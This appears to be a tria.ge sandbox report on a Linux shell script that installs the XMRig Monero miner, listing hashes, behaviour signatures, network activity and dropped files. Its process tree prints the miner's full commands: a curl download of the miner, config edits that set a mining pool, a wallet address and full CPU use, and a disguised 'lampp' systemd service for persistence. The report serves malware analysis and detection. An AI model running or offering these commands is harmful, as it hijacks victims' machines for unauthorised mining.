Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1s -
max time network
128s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
-
submitted
01/07/2024, 12:18 UTC
General
-
Target
script.sh
-
Size
8KB
-
MD5
97423634cc1762b2f010cb860e7fb47d
-
SHA1
2f50775e8fe9ab98a80f06d835c5874091bf0b3e
-
SHA256
d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
-
SHA512
bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
-
SSDEEP
192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Executes dropped EXE 1 IoCs
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 45 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/script.sh/tmp/script.sh1⤵
- Writes file to tmp directory
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/usr/bin/nprocnproc2⤵
-
-
/usr/bin/bcbc -l2⤵
-
-
/usr/bin/curlcurl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz2⤵
- Writes file to tmp directory
-
-
/usr/bin/mkdirmkdir /root/lampp2⤵
- Reads runtime system information
-
-
/usr/bin/tartar xf /tmp/xmrig.tar.gz -C /root/lampp2⤵
- Reads runtime system information
-
/usr/local/sbin/gzipgzip -d3⤵
-
-
/usr/local/bin/gzipgzip -d3⤵
-
-
/usr/sbin/gzipgzip -d3⤵
-
-
/usr/bin/gzipgzip -d3⤵
-
-
-
/usr/bin/rmrm /tmp/xmrig.tar.gz2⤵
-
-
/usr/bin/sedsed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /root/lampp/config.json2⤵
-
-
/root/lampp/xmrig/root/lampp/xmrig --help2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"2⤵
-
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/usr/bin/hostnamehostname2⤵
-
-
/usr/bin/sedsed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"gulf.moneroocean.stream:10001\",/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"47zZneDdPNr63HM9ubMyrhYvLNbDunCkiia6fNCvQkThNuK6rrj59e3Y2nNF3ETeewbALAGYaiti4SF4ENwJ8bR7PKXXcMN\",/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu2204-amd64-20240611-en-1\",/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 100,/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s#\"log-file\": *null,#\"log-file\": \"/root/lampp/xmrig.log\",#" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /root/lampp/config.json2⤵
-
-
/usr/bin/cpcp /root/lampp/config.json /root/lampp/config_background.json2⤵
- Reads runtime system information
-
-
/usr/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /root/lampp/config_background.json2⤵
-
-
/usr/bin/catcat2⤵
-
-
/usr/bin/chmodchmod +x /root/lampp/miner.sh2⤵
-
-
/usr/bin/sudosudo -n true2⤵
-
/usr/bin/truetrue3⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
-
-
/usr/bin/grepgrep MemTotal /proc/meminfo2⤵
-
-
/usr/bin/catcat2⤵
-
-
/usr/bin/sudosudo mv /tmp/lampp.service /etc/systemd/system/lampp.service2⤵
- Reads runtime system information
-
/usr/bin/mvmv /tmp/lampp.service /etc/systemd/system/lampp.service3⤵
- Reads runtime system information
-
-
-
/usr/bin/sudosudo killall xmrig2⤵
- Reads runtime system information
-
/usr/bin/killallkillall xmrig3⤵
- Reads runtime system information
-
-
-
/usr/bin/sudosudo systemctl daemon-reload2⤵
- Reads runtime system information
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
-
-
-
/usr/bin/sudosudo systemctl enable lampp.service2⤵
- Reads runtime system information
-
/usr/bin/systemctlsystemctl enable lampp.service3⤵
- Reads runtime system information
-
-
-
/usr/bin/sudosudo systemctl start lampp.service2⤵
-
/usr/bin/systemctlsystemctl start lampp.service3⤵
- Reads runtime system information
-
-
Network
-
DNSraw.githubusercontent.comRemote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.110.133 -
DNSraw.githubusercontent.comRemote address:8.8.8.8:53Requestraw.githubusercontent.comIN AAAAResponseraw.githubusercontent.comIN AAAA2606:50c0:8001::154raw.githubusercontent.comIN AAAA2606:50c0:8000::154raw.githubusercontent.comIN AAAA2606:50c0:8002::154raw.githubusercontent.comIN AAAA2606:50c0:8003::154
-
185.199.109.133:443raw.githubusercontent.comtls
-
224.0.0.251:5353 -
8.8.8.8:53raw.githubusercontent.comdns
DNS Request
raw.githubusercontent.com
DNS Response
185.199.109.133185.199.111.133185.199.108.133185.199.110.133
-
8.8.8.8:53raw.githubusercontent.comdns
DNS Request
raw.githubusercontent.com
DNS Response
2606:50c0:8001::1542606:50c0:8000::1542606:50c0:8002::1542606:50c0:8003::154
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f3294129e6b76283965ad86a815bf383
SHA15fe0ab538f86962efe82cb13fc2da745610740af
SHA256578386126ae451940ff5c21ce95b4e3be85c2d33160d6e739ed0ebbd206c7e81
SHA51207a280be17282096ed8c319623d2e02e088e80d69e3d6d24ecaef5bedf624d006dc4963b8b1a6c0569a3c9221786bfd7cd462dddebcfcbed7879fd994b4c8333
-
Filesize
253B
MD5f96a321a262287ceae164f23f232ed9c
SHA1d1eeab41f244b42377afd7cc3de7428736162b24
SHA256f572e87f0fc93c5a62023a572cf4c797c942d7618167752779854d6f73efa012
SHA51275fc451b1f3138dbecd907ba5af2246884582190f85b4f574a99696439a3d6839c34a9310d21d206148870c7e6e7604a7ebd8bbd23406c57c6c6346fcb9cc86e
-
Filesize
2KB
MD53f9e732061567666d7168bff892fd0a7
SHA1f7f73a3e10bf3c175694011aa48c377396e5e65a
SHA25656d136b6a08a4795230bb3b05a529da2678a72618d0e7da6645eb8bda6ed298b
SHA51224b62a35c6f66db00b2d16b98da8c8dc4edb68eefdf86a79ac707a71e5eb9149a319eed0a587338bf68d0c294436193e4f347a9d28ac528d2bf33e322f2e66f2
-
Filesize
2KB
MD5d489ddbbb83271e967b8af615d17d3c7
SHA1f0394a367a60e9727269882154098dec802774ef
SHA2565cf89bb7fbef53cc5fbe582017145aa148ad8a8abc5bceee9f887ba4a6fcc46e
SHA512aba9bf29076f1d5b6e81c83e5be1cee5934d23db9093ec3ea8b4d92b521e37e58d80aaea6248dc211544574f3772df990950b9236f40e863a76220f86b157954
-
Filesize
2KB
MD51006dec1464063b07aadf3c2f02324be
SHA1dbe7eaea7465a137757288e333d6f257c3a722b6
SHA256cb7de4ccc8f90cd2f716d93a102e243d0ed9fd04366b61b796221320348b72e1
SHA5123c1654557262edac1ee9fdd91032124bad5a9ea2aea431576d01aca742bbc1e4b4c74873ca5d88118d5382c08eec1082de090fdececced29388c497d57496ba4
-
Filesize
2KB
MD577a17722e6f75840565e2db01a5c4973
SHA118900fdb137e51b8f129be5e70a5462f1e3f9b50
SHA2564cad1ad0a6dabf6f8d00c01ad7db3a79cf781930faae6dc439e7a716d664f6c0
SHA51205958671780c90f253cec6eaaa1fa5954abbfcba965801f4c241de6796afe910a5401525aac6d0da46a0418e31f3bc5ea0efc22287977b88dc57b0900fad1a07
-
Filesize
2KB
MD59c950471bf1bf4726b8557fd7dd500bf
SHA1a6b1b01974188a831fcfd0b2e3023447eca1b494
SHA2564b79f6a98133d373a2d1ff4fd784d78a3b44068dfdba3867dfd2c8dc9213fc74
SHA512247ac1555eabc0a028bd4ca3891ef780da9db6b61e0221a9c37cfcb40c892d4d0bc05070805faf8b7ffce287aa42bf21df9b83a2d7aaf433ab1bd114a2670957
-
Filesize
2KB
MD58b11b027dd187104473ee7d661ffe25f
SHA1ec46117e3b0c2ce9f7fe60ac51eb1861c49e97ef
SHA256984513d85c8a81fbca982bd8c81a73344f39a4fe46bd9b982ed85c0ff6d1030f
SHA5121078b6b53897534be9f070454b8545f8075017025f9252175cfc6651c7eb11a906230558daa22a1086790f5fd5fed43b9b1909b044c70fafae9aba2d99381ea2
-
Filesize
8.4MB
MD5e6b2f9d13d45c128b44cb5405df9ab39
SHA1c07326f69240e3d22d134d156528af3bd5d0497b
SHA25696462c80ee4118a9140b159d5bbf5f3a40a8693d650919e29b23bd3c9c7e4162
SHA5124eef70930aae075d38a871c380b2d1322c5a3cfdfdd6e936447e384bfd6c3f71b4ad7a9dc1dd2213a946f32681686f0db0b6f6e1caf1286a0a7fe36a26ac5632
-
Filesize
177B
MD5540c899b78585827e807a62f7345eaf5
SHA18bf3146889c6b15811f226bff9fbca24d184eff2
SHA256b32af10b7911d7113a1fe52ef467e7f123fb26552cae752ba52aef684b301fcf
SHA5120aac2aced9505d1bde7d6c2fb6166a341982e9a170e7f0f72ede35c1305c4519e2fb07a7658558b41ad319c3d102f07d667a8769ff659b6392c81698d278af46
-
Filesize
3.4MB
MD5e003a3ec8bdd61151a61cadf950502c4
SHA12606bd45a8d45092c7d2c0ac9d6e92ec7ef7950e
SHA25680b1dc6f56a95273420dc96e837d7e1a9f42c057e319dadac0cccee4425319e0
SHA512ef80c71d8b0d09128abf9e67fe12a8cd843500419da43e7a284e016029391d826c503aeec3073a2b3d7d90ba24f18990edf6965cd38a270bbe57f20c6be022f9